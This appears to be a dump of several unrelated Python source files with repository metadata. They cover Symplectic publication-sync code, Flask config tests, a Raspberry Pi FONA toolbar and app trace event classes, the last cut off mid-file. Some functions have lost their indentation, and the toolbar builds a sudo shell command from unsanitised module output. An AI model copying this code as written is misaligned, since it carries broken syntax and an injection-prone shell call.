else:
SubElement(user_element, 'is-academic').text = 'false'
SubElement(
user_element, 'generic-field-01'
).text = user_object.generic_field_1_dept
SubElement(
user_element,
'generic-field-02'
).text = user_object.generic_field_2_dept_id
SubElement(
user_element,
'generic-field-11'
).text = user_object.generic_field_11_irg
SubElement(
user_element,
'generic-field-12'
).text = user_object.generic_field_12_irg_id
SubElement(
user_element,
'generic-field-13'
).text = user_object.generic_field_13_admin
SubElement(
user_element,
'generic-field-14'
).text = user_object.generic_field_14_institute
SubElement(
user_element,
'generic-field-15'
).text = user_object.generic_field_15_institute_id
# break connection between user_element pointer-variable and the
# actual xml-subelement in memory that contains the data
user_element = None
#Convert to ElementTree and write xml version to file
xml_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_USER_FOLDER,
TIMESTAMP,
SYMPLECTIC_LOCAL_USER_IMPORTFILE
])
ElementTree(users_root).write(xml_filename)
#Return xml filename
print "writing with", xml_filename
return xml_filename
def _create_symplectic_user_list(researcher_list):
    """Map publications.Researcher objects to Symplectic User objects."""
    users = []
    for researcher in researcher_list:
        person = researcher.person
        user = User()
        user.title = str(person.title)
        user.initials = person.initials
        user.first_name = person.given_name
        user.last_name = person.surname
        user.known_as = ''
        user.suffix = ''
        user.email = person.email
        user.authenticating_authority = AUTHENTICATING_AUTHORITY
        user.username = person.institutional_username
        user.proprietary_id = str(person.id)
        user.primary_group_descriptor = 'MEDIC'
        user.is_academic = True
        # Admin flag: has Symplectic access but does not publish
        if researcher.symplectic_access and not researcher.publishes:
            user.generic_field_13_admin = 'Y'
        else:
            user.generic_field_13_admin = 'N'
        # Institute lookup retained; its result is currently unused
        institute = _determine_institute(researcher)
        # if institute:
        #     user.generic_field_14_institute = institute.name
        # if institute:
        #     user.generic_field_15_institute_id = str(institute.id)
        users.append(user)
    return users
# functions to retrieve users from Symplectic
def get_user_ids(researcher_list):
"""
Asks Symplectic API for the ID for researchers
"""
# Retrieved SymplecticIDs
ids = []
# For each researcher, ask symplectic for their Symplectic-id
for researcher in researcher_list:
print researcher
SymplecticID = _get_users(researcher)
if SymplecticID and SymplecticID != '':
ids.append(SymplecticID)
return ids
def _get_users(researcher_object):
    """
    Asks Symplectic API for User info about specified researcher
    Specify which researcher using proprietary-id
    Receives XML File as response
    Parses XML File to find symplectic ID for each User

    Side effect: stores the retrieved id on researcher_object
    (symplectic_id) and saves it. Returns the id, or "" if the
    response contained no users.
    """
    # symplectic api url and local file path
    url = "".join([
        SYMPLECTIC_API_URL,
        'search-users?',
        '&include-deleted=true',
        '&authority=',
        AUTHENTICATING_AUTHORITY,
        '&proprietary-id=',
        str(researcher_object.person_id)
    ])
    #'&username=' + researcher_object.person.institutional_username + \
    tmp_filename = "".join([
        SYMPLECTIC_LOCAL_XML_FOLDER,
        SYMPLECTIC_LOCAL_USER_FOLDER,
        str(researcher_object.person_id),
        '.xml'
    ])
    # get xml document from symplectic api and store on hd
    # NOTE(review): urllib.urlretrieve does not normally raise
    # urllib2.URLError, so this handler may never trigger - confirm.
    try:
        (tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
    except urllib2.URLError:
        raise ESymplecticGetFileError("""
           Could not HTTP GET the XML file of User GUID from Symplectic API
           """)
    # parse xml file
    users_etree = ElementTree(file=tmp_filename)
    usersresponse_element = users_etree.getroot()
    # delete local file from hd
    #try:
    os.remove(tmp_filename)
    #except:
    #pass
    # check if any user elements in tree
    if usersresponse_element is None:
        return ""
    # for each retrieved user element in tree (should only be 1)
    for user_element in usersresponse_element.getchildren():
        # pull out of xml what symplectic says this researcher's proprietary
        # id and symplectic-id are
        proprietary_id = user_element.attrib.get("proprietary-id")
        id = user_element.attrib.get("id")
        # if arkestra and symplectic agree this is the same person
        if str(researcher_object.person_id) == proprietary_id:
            # researcher_object.symplectic_int_id = id # int_id version
            researcher_object.symplectic_id = id # guid version
            researcher_object.save()
            # force return after 1 (should only be 1 person per xml file
            # anyway)
            return id
        else:
            # NOTE(review): raises on the FIRST non-matching element
            # rather than skipping it - confirm this is intended.
            raise ESymplecticExtractUserGUIDError("""
               ID returned by Symplectic API not for correct Arkestra User
               (Proprietary ID doesnt match
               """)
# functions to get authored items
def get_authoreds(researcher_object):
    """
    Asks Symplectic API for info about specified researcher
    Receives XML File as response
    Parses XML File to find all publications for that researcher & notes
    preferences they have for each publication

    Does nothing unless the researcher has a symplectic_id. Replaces
    the researcher's existing authored links with the fetched ones.
    """
    # checking
    # if not(researcher_object) or (researcher_object.symplectic_int_id is
    # None): # int_id version
    if not(researcher_object) or (researcher_object.symplectic_id is None):
        # guid version
        return
    # symplectic api url and local file path
    # url = SYMPLECTIC_API_URL + 'users/' +
    # str(researcher_object.symplectic_int_id) # int_id version
    url = "".join([
        SYMPLECTIC_API_URL,
        'users/',
        str(researcher_object.symplectic_id)
    ])
    # # tmp_filename = SYMPLECTIC_LOCAL_XML_FOLDER +
    # SYMPLECTIC_LOCAL_AUTH_FOLDER +
    # str(researcher_object.symplectic_int_id)
    # + '.xml' # int_id version
    tmp_filename = "".join([
        SYMPLECTIC_LOCAL_XML_FOLDER,
        SYMPLECTIC_LOCAL_AUTH_FOLDER,
        str(researcher_object.symplectic_id),
        '.xml'
    ])
    # get xml document from symplectic api and store on hd
    # NOTE(review): unlike _get_users, download errors here are not
    # wrapped in ESymplecticGetFileError - they propagate raw.
    (tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
    # parse xml file
    publications_etree = ElementTree(file=tmp_filename)
    # delete local file from hd
    #try:
    os.remove(tmp_filename)
    #except:
    #pass
    # publication elements are held in a subtree
    publications_subtree = publications_etree.find(
        SYMPLECTIC_NAMESPACE + 'publications'
    )
    # check if any publication elements in subtree
    if publications_subtree is None or len(publications_subtree) < 1:
        return
    # now that we have their newest "i authored that pub" info, we can
    # delete their old "i authored that pub" info
    researcher_object.remove_all_authored()
    # for each publication element in subtree
    for publication_element in publications_subtree.getchildren():
        _create_authored(publication_element, researcher_object)
def _create_authored(publication_element, researcher_object):
    """Create/refresh the Authored link for one publication element.

    Takes an XML publication element lifted from a Symplectic User file
    (which only carries key fields, unlike a full publication XML file):
    - extracts the publication guid and loads/creates the Publication
      (created ones are flagged as needing a refetch from Symplectic);
    - extracts the indicated biblio-record's data-source and
      loads/creates the BibliographicRecord (links it to the
      publication);
    - extracts the researcher's preferences (visible, favourite,
      sort order) for the publication and stores them on the Authored
      link.
    """
    # ++++++PUBLICATION LITE++++++
    if publication_element is None:
        return
    guid = publication_element.get('id', '')
    if guid == '':
        return
    publication_object = Publication.getOrCreatePublication(guid)
    # ++++++BIBLIOGRAPHICRECORD LITE++++++
    # Only ONE biblio element per publication is returned when querying
    # by user id; multiple are returned when querying by a publication
    # guid.
    biblio_element = publication_element.find(
        SYMPLECTIC_NAMESPACE + 'bibliographic-record'
    )
    if biblio_element is None:
        # Without a biblio record no Authored link can be built (the
        # original code hit NameError on biblio_object here).
        return
    data_source = biblio_element.get('data-source', '')
    # Links biblio & publication
    biblio_object = BibliographicRecord.getOrCreateBibliographicRecord(
        publication_object, data_source
    )
    # ++++++AUTHORED++++++
    preferences_element = publication_element.find(
        SYMPLECTIC_NAMESPACE + 'preferences-for-this-publication'
    )
    # Links authored & publication & researcher & bibliographic-record
    authored_object = Authored.getOrCreateAuthored(
        publication_object, researcher_object, biblio_object
    )
    if preferences_element is not None:
        # Show this publication
        authored_object.visible = (
            preferences_element.get('visible', 'false') == 'true'
        )
        # Favourite publication
        authored_object.is_a_favourite = (
            preferences_element.get('is-a-favourite', 'false') == 'true'
        )
        # Display order
        authored_object.reverse_sort_cue = preferences_element.get(
            'reverse-sort-cue', ''
        )
    authored_object.save()
# XML parsing functions
def update_publication(publication_object):
    """
    Asks Symplectic API for info about specified publication based upon
    its guid
    Receives XML File as response
    Parses XML File to find publication info & all biblio-records for that
    publication

    Updates and saves the passed-in publication_object in place, then
    (re)creates its bibliographic records.
    """
    # checking
    if not(publication_object) or (publication_object.guid == ''):
        return
    # symplectic api url and local file path
    url = SYMPLECTIC_API_URL + 'publications/' + publication_object.guid
    tmp_filename = "".join([
        SYMPLECTIC_LOCAL_XML_FOLDER,
        SYMPLECTIC_LOCAL_PUBS_FOLDER,
        str(publication_object.guid),
        '.xml'
    ])
    # get xml document from symplectic api and store on hd
    (tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
    # parse xml file
    pub_etree = ElementTree(file=tmp_filename)
    # delete local file from hd
    # try:
    os.remove(tmp_filename)
    # except:
    # pass
    #++++++PUBLICATION++++++
    # publication element
    pub_element = pub_etree.getroot()
    # no loading-of/blank publication object required as updating the one
    # passed in
    # check returned xml element is valid and for correct publication
    if pub_element is None:
        return
    elif publication_object.guid != pub_element.get('id', ''):
        # response is for a different publication - ignore it
        return
    # publication attributes
    if pub_element is not None:
        publication_object.new_id = pub_element.get('new-id')
        if pub_element.get('is-deleted', 'false') == 'true':
            publication_object.is_deleted = True
        else:
            publication_object.is_deleted = False
        # copy hyphenated XML attributes onto underscored model fields
        attr_names = ["type", "created-when", "last-modified-when"]
        for attr_name in attr_names:
            attr_value = pub_element.get(attr_name, "")
            setattr(
                publication_object,
                attr_name.replace("-", "_"),
                attr_value
            )
        # just fetched latest version from symplectic
        publication_object.needs_refetch = False
        # save updated publication object
        publication_object.save()
    # ++++++BIBLIOGRAPHIC-RECORD++++++
    # bibliographic-record elements are held in a subtree
    biblio_subtree = pub_etree.find(
        SYMPLECTIC_NAMESPACE + 'bibliographic-records'
    )
    # check if any bibliographic-record elements in subtree
    if biblio_subtree is None or len(biblio_subtree) < 1:
        return
    # for each bibliographic-record element in subtree
    for biblio_element in biblio_subtree.getchildren():
        _create_biblio_object(biblio_element, publication_object)
def _get_element_text(element):
if element is None:
return ''
else:
return element.text
def _create_biblio_object(biblio_element, publication_object):
"""
Takes an XML biblio-record element lifted from a Symplectic Publication
file (which contains the FULL info about each biblio-record unlike a
User XML file) extracts full info about that biblio-record,
loads/creates biblio-object, populates it with this new info and saves
it
"""
# ++++++BIBLIOGRAPHIC-RECORD++++++
# check Bibliographical-record Element
# print " creating", biblio_element
if biblio_element is None:
# print " giving up in _create_biblio_object"
return
# make blank Biblio Object
biblio_object = BibliographicRecord()
# Bibliographic-record sub-elements (used to read XML)
if biblio_element is not None:
bibliometric_data_element = biblio_element.find(
SYMPLECTIC_NAMESPACE + 'bibliometric-data'
)
bibliographic_data_element = biblio_element.find(
SYMPLECTIC_NAMESPACE + 'bibliographic-data'
)
if bibliographic_data_element is not None:
native_element = bibliographic_data_element.find(
SYMPLECTIC_NAMESPACE + 'native'
)
if native_element is not None:
authors_subtree = native_element.find(SYMPLECTIC_NAMESPACE + 'authors')
keywords_subtree = native_element.find(
SYMPLECTIC_NAMESPACE + 'keywords'
)
# bibliographic-record attribs
if biblio_element is not None:
biblio_object.data_source = biblio_element.get('data-source', '')
biblio_object.id_at_source = biblio_element.get('id-at-source', '')
biblio_object.verification_status = _get_element_text(
biblio_element.find(SYMPLECTIC_NAMESPACE + 'verification-status')
)
# bibliometric data
if bibliometric_data_element is not None:
biblio_object.times_cited = _get_element_text(
bibliometric_data_element.find(
SYMPLECTIC_NAMESPACE + 'times-cited'
)
)
biblio_object.reference_count = _get_element_text(
bibliometric_data_element.find(
SYMPLECTIC_NAMESPACE + 'reference-count'
)
)
# native
if native_element is not None:
attr_names = [
'abstract', 'associated-authors', 'awarded-date', 'begin-page',
'book-author-type', 'commissioning-body', 'confidential', 'doi',
'edition', 'editors', 'end-page', 'filed-date', 'finish-date',
'isbn-10', 'isbn-13', 'issn', 'issue', 'journal',
'journal-article-type', 'language', 'location', 'medium',
'name-of-conference', 'notes', 'number', 'number-of-pages',
'number-of-pieces', 'parent-title', 'patent-number', 'pii',
'place-of-publication', 'publication-date', 'publication-status',
'publication-status', 'series', 'start-date', 'title', 'version',
'volume'
]
for attr_name in attr_names:
element = native_element.find(SYMPLECTIC_NAMESPACE + attr_name)
attr_value = _get_element_text(element)
setattr(biblio_object, attr_name.replace("-", "_"), attr_value)
# authors
if authors_subtree is not None:
biblio_object.authors = ''
author_list = []
for author_element in authors_subtree.getchildren():
name = _get_element_text(
author_element.find(SYMPLECTIC_NAMESPACE + 'name')
)
initials = _get_element_text(
author_element.find(SYMPLECTIC_NAMESPACE + 'initials')
)
author_list.append(unicode(name) + ' ' + unicode(initials))
biblio_object.authors = ", ".join(author_list)
print biblio_object.authors
#derived authors
biblio_object.number_of_authors = len(author_list)
if len(author_list) > 0:
biblio_object.first_author = author_list[0]
if len(author_list) > 1:
biblio_object.last_author = author_list[-1]
# keywords
if keywords_subtree is not None:
biblio_object.keywords = ''
for keyword_element in keywords_subtree.getchildren():
biblio_object.keywords = "|".join([
biblio_object.keywords,
unicode(keyword_element.text)
])
# link bibliographic-record object and passed-in publication object
biblio_object.publication = publication_object
# save
# print " going to save biblio_object", biblio_object, \
# "publication_id", biblio_object.publication_id
biblio_object.save()
# ++++++URLS++++++
# delete all existing URLs for this biblio-record
biblio_object.urls.all().delete()
# URL elements are held in a subtree
url_subtree = biblio_element.find(SYMPLECTIC_NAMESPACE + 'urls')
# check if any url elements in subtree
if url_subtree is None or len(url_subtree) < 1:
return
# for each url element in subtree
for url_element in url_subtree.getchildren():
_create_url_object(url_element, biblio_object)
def _create_url_object(url_element, biblio_object):
    """Create and save a BiblioURL for one url XML element.

    The element comes from a Symplectic Publication file; the new URL
    record is attached to the given bibliographic record.
    """
    if url_element is None:
        return
    url_object = BiblioURL()
    url_object.type = url_element.get('type', '')
    url_object.link = url_element.text
    # Attach to the owning bibliographic record before saving
    url_object.bibliographic_record = biblio_object
    url_object.save()
def mark_changed_publications(modified_since):
    """Flag publications modified in Symplectic since a given date.

    modified_since must be 'yyyy-mm-dd'; 'T00:00:00Z' is appended (UTC
    timezone, with ':' URL-encoded as %3A). Each publication in the
    API response that already exists locally is flagged as needing a
    re-fetch from Symplectic.
    """
    url = (
        SYMPLECTIC_API_URL
        + 'search-publications?modified-since-when='
        + modified_since
        + 'T00%3A00%3A00Z'
    )
    tmp_filename = (
        SYMPLECTIC_LOCAL_XML_FOLDER
        + SYMPLECTIC_LOCAL_PUBSMODIFIED_FOLDER
        + modified_since
        + '.xml'
    )
    # Fetch the XML document from the Symplectic API onto disk
    (tmp_filename, http_headers) = urllib.urlretrieve(url, tmp_filename)
    search_publications_etree = ElementTree(file=tmp_filename)
    # Remove the temporary download once parsed
    os.remove(tmp_filename)
    # The publication-lite elements hang directly off the root element
    root_element = search_publications_etree.getroot()
    if root_element is None or len(root_element) < 1:
        return
    for search_publication_element in root_element.getchildren():
        _flag_publication_as_needing_refetch(search_publication_element)
def _flag_publication_as_needing_refetch(search_publication_element):
    """Flag an existing local Publication as needing a Symplectic re-fetch.

    The element comes from a Symplectic modified-publications file and
    only carries key fields. Publications unknown to the local db are
    ignored rather than created: if they were never linked to a
    researcher, we do not care about them.
    """
    if search_publication_element is None:
        return
    guid = search_publication_element.get('id', '')
    if guid == '':
        return
    # Load only - deliberately do NOT create missing publications
    publication_object = Publication.getPublication(guid)
    if publication_object is None:
        return
    # Symplectic has a newer version of this publication
    publication_object.needs_refetch = True
    publication_object.save()
class ESymplecticError(Exception):
    """Base class for all Symplectic API errors.

    Exposes the first exception argument as a read/write 'message'
    property.
    """
    def __init__(self, message):
        super(ESymplecticError, self).__init__(message)

    def _get_message(self):
        return self.args[0]

    def _set_message(self, message):
        # Exception.args is a tuple, so item assignment (as the
        # original did) raised TypeError. Rebuild the tuple instead.
        self.args = (message,) + self.args[1:]

    message = property(_get_message, _set_message)
class ESymplecticGetFileError(ESymplecticError):
    """Raised when an HTTP GET from the Symplectic API fails."""
    pass
class ESymplecticParseFileError(ESymplecticError):
    """Raised when a Symplectic API XML response cannot be parsed."""
    pass
class ESymplecticPostFileError(ESymplecticError):
    """Raised when an HTTP POST to the Symplectic API fails."""
    pass
class ESymplecticExtractUserGUIDError(ESymplecticError):
    """Raised when the user ID returned by the Symplectic API does not
    match the requested Arkestra user (proprietary-id mismatch)."""
    pass
| {
"repo_name": "evildmp/arkestra-publications",
"path": "symplectic/models.py",
"copies": "1",
"size": "32335",
"license": "bsd-2-clause",
"hash": 2402671223687271400,
"line_mean": 34.6194790487,
"line_max": 79,
"alpha_frac": 0.6295036338,
"autogenerated": false,
"ratio": 3.956803720019579,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0015310938201061868,
"num_lines": 883
} |
# app/tests/test_config.py
import unittest
from flask import current_app
from flask_testing import TestCase
from app import app
class TestDevelopmentConfig(TestCase):
    """Checks for the development configuration."""

    def create_app(self):
        # Flask-Testing hook: build the app under the development config
        app.config.from_object('app.config.DevelopmentConfig')
        return app

    def test_app_is_development(self):
        self.assertFalse(current_app.config['TESTING'])
        # assertIs pins the exact boolean value with a clearer failure
        # message than assertTrue(x is True)
        self.assertIs(app.config['DEBUG'], True)
        # self.assertTrue(app.config['WTF_CSRF_ENABLED'] is False)
        # self.assertTrue(app.config['DEBUG_TB_ENABLED'] is True)
        self.assertIsNotNone(current_app)
class TestTestingConfig(TestCase):
    """Checks for the testing configuration."""

    def create_app(self):
        # Flask-Testing hook: build the app under the testing config
        app.config.from_object('app.config.TestingConfig')
        return app

    def test_app_is_testing(self):
        self.assertTrue(current_app.config['TESTING'])
        # assertIs pins the exact boolean value with a clearer failure
        # message than assertTrue(x is True)
        self.assertIs(app.config['DEBUG'], True)
        # self.assertTrue(app.config['BCRYPT_LOG_ROUNDS'] == 4)
        # self.assertTrue(app.config['WTF_CSRF_ENABLED'] is False)
class TestProductionConfig(TestCase):
    """Checks for the production configuration."""

    def create_app(self):
        # Flask-Testing hook: build the app under the production config
        app.config.from_object('app.config.ProductionConfig')
        return app

    def test_app_is_production(self):
        self.assertFalse(current_app.config['TESTING'])
        # DEBUG must be exactly False in production
        self.assertIs(app.config['DEBUG'], False)
        # self.assertTrue(app.config['DEBUG_TB_ENABLED'] is False)
        # self.assertTrue(app.config['WTF_CSRF_ENABLED'] is True)
        # self.assertTrue(app.config['BCRYPT_LOG_ROUNDS'] == 13)
if __name__ == '__main__':
    # Allow running this test module directly
    unittest.main()
| {
"repo_name": "7anshuai/flask-todo",
"path": "app/tests/test_config.py",
"copies": "1",
"size": "1571",
"license": "mit",
"hash": -5438790479054222000,
"line_mean": 28.0925925926,
"line_max": 66,
"alpha_frac": 0.6677275621,
"autogenerated": false,
"ratio": 3.636574074074074,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48043016361740737,
"avg_score": null,
"num_lines": null
} |
import time
import os
import pygame
from pygame.locals import *
class Toolbar():
    """Status toolbar backed by a FONA GSM module.

    Polls the FONA over AT commands for reception strength and battery
    level, prepares pygame rects/text for rendering them, and syncs
    the Pi system clock from the FONA RTC at start-up.
    """
    def __init__(self, fona):
        # Seconds between reception/battery refreshes in clock()
        self.UPDATE_TIME = 30
        # Battery percentage below which the battery counts as dead
        self.DEAD = 30
        # Handle used for AT-command I/O with the FONA module
        self.fona = fona
        # Define colors
        self.WHITE = (255,255,255)
        self.BLACK = (0,0,0)
        # Latched to True once the battery drops below self.DEAD
        self.dead_bat = False
        # Setup fonts
        self.font = pygame.font.Font('/home/pi/tyos/fonts/liberation_sans.ttf', 14)
        # Setup battery percentage text (placeholder until first poll)
        self.bat_left = self.font.render('..%', True, self.BLACK, self.WHITE)
        self.bat_left_rect = self.bat_left.get_rect()
        self.bat_left_rect.centerx = 285
        self.bat_left_rect.centery = 15
        # Set the Pi clock to the Fona RTC
        self.rtc()
        # Timestamp of the last reception/battery refresh
        self.last_update = time.time()

    def rtc(self):
        """Read the FONA real-time clock and set the Pi system time."""
        # Get time from RTC on FONA; transmit() returns a sequence and
        # index [1] holds the response line
        self.rtc_time = self.fona.transmit('AT+CCLK?')
        self.rtc_time = self.rtc_time[1]
        # Parse string to include hours and seconds only
        # (assumes a 'date,hh:mm:ss-zz'-style response - TODO confirm
        # against the FONA AT+CCLK documentation)
        self.rtc_time = self.rtc_time.split(',')
        self.rtc_time = self.rtc_time[1]
        self.rtc_time = self.rtc_time.split('-')
        self.rtc_time = self.rtc_time[0]
        # NOTE(review): the value is printed before its label - these
        # two prints look swapped
        print self.rtc_time
        print 'RTC TIME:'
        # Set Overall Time via the system 'date' utility
        os.system('sudo date +%T -s "' + self.rtc_time + '"')

    def check_reception(self, rects, y):
        """Poll AT+CSQ and return rects for the signal-strength bars.

        y is the vertical offset of the toolbar. The 'rects' argument
        is ignored and rebuilt from scratch.
        """
        self.raw_reception = self.fona.transmit('AT+CSQ')
        self.raw_reception = self.raw_reception[1]
        # Remove line feeds and echo: strip characters up to and
        # including the first space.
        # NOTE(review): str.replace(i, '', 1) removes the FIRST
        # occurrence of each character, so this relies on those
        # characters not repeating later in the string - confirm.
        for i in self.raw_reception:
            if i != ' ':
                self.raw_reception = self.raw_reception.replace(i, '', 1)
            else:
                self.raw_reception = self.raw_reception.replace(i, '', 1)
                break
        # Extract dbm: trim from the end back to the last comma
        for i in reversed(self.raw_reception):
            if i != ',':
                self.raw_reception = self.raw_reception.replace(i, '', 1)
            else:
                self.raw_reception = self.raw_reception.replace(i, '', 1)
                break
        try:
            self.reception = int(self.raw_reception)
        except:
            # Unparseable response: treat as no signal
            self.reception = 0
            print 'ERROR'
        # Convert raw signal quality to a 0-4 bar count
        if self.reception > 23:
            self.bars = 4
        elif self.reception > 17:
            self.bars = 3
        elif self.reception > 12:
            self.bars = 2
        elif self.reception > 8:
            self.bars = 1
        else:
            self.bars = 0
        # Reception Bar rects x y w h
        self.one = pygame.Rect(10, y + 18, 5, 7)
        self.two = pygame.Rect(23, y + 13, 5, 12)
        self.three = pygame.Rect(38, y + 8, 5, 17)
        self.four = pygame.Rect(53, y + 3, 5, 22)
        # NOTE(review): self.WHITE is re-assigned to the same value it
        # was given in __init__, and the 'rects' parameter is discarded
        # and rebuilt here - both look redundant.
        self.WHITE = (255,255,255)
        rects = {'rects':[], 'colors':[]}
        # Add one rect per bar of signal strength
        if self.bars > 3:
            rects['rects'].append(self.four)
            rects['colors'].append(self.WHITE)
        if self.bars > 2:
            rects['rects'].append(self.three)
            rects['colors'].append(self.WHITE)
        if self.bars > 1:
            rects['rects'].append(self.two)
            rects['colors'].append(self.WHITE)
        if self.bars > 0:
            rects['rects'].append(self.one)
            rects['colors'].append(self.WHITE)
        print 'RECEPTION: ' + str(self.reception) + 'dbm'
        return rects

    def check_battery(self, text):
        """Poll AT+CBC and update text['surface'] with the battery %.

        Latches self.dead_bat once the percentage drops below
        self.DEAD.
        """
        # Get battery level from fona; the percentage is the second
        # comma-separated field of the response line
        self.raw_data = self.fona.transmit('AT+CBC')
        self.raw_data = self.raw_data[1]
        self.raw_data = self.raw_data.split(',')
        self.percentage = self.raw_data[1]
        print 'BATTERY LEVEL: ' + self.percentage + '%'
        if int(self.percentage) < self.DEAD:
            self.dead_bat = True
        text['surface'] = self.font.render(self.percentage + '%', True, self.BLACK, self.WHITE)
        return text

    def clock(self, rects, text, update, y):
        """Refresh reception and battery info when UPDATE_TIME elapsed.

        Returns (rects, text, update, dead_bat); 'update' is set True
        only when a refresh actually happened.
        """
        if time.time() - self.last_update > self.UPDATE_TIME:
            print 'UPDATING...'
            self.last_update = time.time()
            rects = self.check_reception(rects, y)
            text = self.check_battery(text)
            update = True
        return rects, text, update, self.dead_bat
if __name__ == '__main__':
    #Manual smoke test: initialise pygame and render the toolbar once
    pygame.init()
    t = Toolbar()
    t.blit_time()
| {
"repo_name": "spadgenske/TYOS",
"path": "src/toolbar.py",
"copies": "1",
"size": "4521",
"license": "mit",
"hash": -4413084621565965300,
"line_mean": 28.940397351,
"line_max": 95,
"alpha_frac": 0.5275381553,
"autogenerated": false,
"ratio": 3.491119691119691,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45186578464196914,
"avg_score": null,
"num_lines": null
} |
"""App trace events.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import abc
import enum # pylint: disable=wrong-import-order
import logging
from .. import _events
_LOGGER = logging.getLogger(__name__)
class AppTraceEvent(_events.TraceEvent):
    """Parent class of all app trace events.
    Contains the basic attributes of all events as well as the factory method
    `from_data` that instantiates an event object from its data representation.
    All app event classes must derive from this class.
    """
    __slots__ = (
        'event_type',
        'timestamp',
        'source',
        'instanceid',
        'payload',
    )
    def __init__(self,
                 timestamp=None, source=None, instanceid=None, payload=None):
        # Look up this concrete class in AppTraceEventTypes to recover its
        # wire-format type name (e.g. ScheduledTraceEvent -> 'scheduled').
        self.event_type = AppTraceEventTypes(self.__class__).name
        # Timestamps are normalized to float seconds; None means unset.
        if timestamp is None:
            self.timestamp = None
        else:
            self.timestamp = float(timestamp)
        self.source = source
        self.payload = payload
        self.instanceid = instanceid
    @property
    @abc.abstractmethod
    def event_data(self):
        """Return an event's event_data.
        Subclasses serialize their extra attributes into this value.
        """
    @classmethod
    def _class_from_type(cls, event_type):
        """Return the class for a given event_type.
        Logs a warning and returns None for unknown type names.
        """
        etype = getattr(AppTraceEventTypes, event_type, None)
        if etype is None:
            _LOGGER.warning('Unknown event type %r', event_type)
            return None
        eclass = etype.value
        return eclass
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        """Instantiate an event from given event data.
        Returns None (with a warning) when the type is unknown or the
        subclass fails to parse `event_data`.
        """
        eclass = cls._class_from_type(event_type)
        if eclass is None:
            return None
        try:
            event = eclass.from_data(
                timestamp=timestamp,
                source=source,
                instanceid=instanceid,
                event_type=event_type,
                event_data=event_data,
                payload=payload
            )
        except Exception:  # pylint: disable=broad-except
            _LOGGER.warning('Failed to parse event type %r:', event_type,
                            exc_info=True)
            event = None
        return event
    def to_data(self):
        """Return a 6-tuple representation of an event:
        (timestamp, source, instanceid, event_type, event_data, payload).
        """
        event_data = self.event_data
        # Normalize a missing event_data to the empty string for transport.
        if event_data is None:
            event_data = ''
        return (
            self.timestamp,
            self.source,
            self.instanceid,
            self.event_type,
            event_data,
            self.payload
        )
    @classmethod
    def from_dict(cls, event_data):
        """Instantiate an event from a dict of its data.
        NOTE: pops 'event_type', mutating the caller's dict.
        """
        event_type = event_data.pop('event_type')
        eclass = cls._class_from_type(event_type)
        if eclass is None:
            return None
        try:
            event = eclass(**event_data)
        except Exception:  # pylint: disable=broad-except
            _LOGGER.warning('Failed to instanciate event type %r:', event_type,
                            exc_info=True)
            event = None
        return event
    def to_dict(self):
        """Return a dictionary representation of an event.
        """
        # NOTE(review): super(self.__class__, self) resolves relative to the
        # instance's concrete class, so this assumes exactly one subclassing
        # level below AppTraceEvent -- confirm before deepening the hierarchy.
        return {
            k: getattr(self, k)
            for k in super(self.__class__, self).__slots__ + self.__slots__
        }
class ScheduledTraceEvent(AppTraceEvent):
    """Event emitted when a container instance is placed on a node.
    """
    __slots__ = (
        'where',
        'why',
    )
    def __init__(self, where, why,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(ScheduledTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.where = where
        self.why = why
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # event_data is '<where>:<why>'; the ':<why>' part is optional.
        where, sep, why = event_data.partition(':')
        if not sep:
            why = None
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, where=where, why=why)
    @property
    def event_data(self):
        # A missing reason is rendered as the literal string 'None'.
        return '{0}:{1}'.format(self.where, self.why)
class PendingTraceEvent(AppTraceEvent):
    """Event emitted when a container instance is seen by the scheduler but
    not placed on a node.
    """
    __slots__ = ('why',)
    def __init__(self, why,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(PendingTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.why = why
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # The raw event_data is the free-form 'why' reason string.
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, why=event_data)
    @property
    def event_data(self):
        return self.why
class PendingDeleteTraceEvent(AppTraceEvent):
    """Event emitted when a container instance is about to be deleted from
    the scheduler.
    """
    __slots__ = ('why',)
    def __init__(self, why,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(PendingDeleteTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.why = why
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # The raw event_data is the free-form 'why' reason string.
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, why=event_data)
    @property
    def event_data(self):
        return self.why
class ConfiguredTraceEvent(AppTraceEvent):
    """Event emitted when a container instance is configured on a node.
    """
    __slots__ = ('uniqueid',)
    def __init__(self, uniqueid,
                 timestamp=None, source=None, instanceid=None, payload=None):
        super(ConfiguredTraceEvent, self).__init__(
            timestamp=timestamp, source=source,
            instanceid=instanceid, payload=payload)
        self.uniqueid = uniqueid
    @classmethod
    def from_data(cls, timestamp, source, instanceid, event_type, event_data,
                  payload=None):
        assert cls == getattr(AppTraceEventTypes, event_type).value
        # event_data carries the container's unique run id verbatim.
        return cls(timestamp=timestamp, source=source, instanceid=instanceid,
                   payload=payload, uniqueid=event_data)
    @property
    def event_data(self):
        return self.uniqueid
class DeletedTraceEvent(AppTraceEvent):
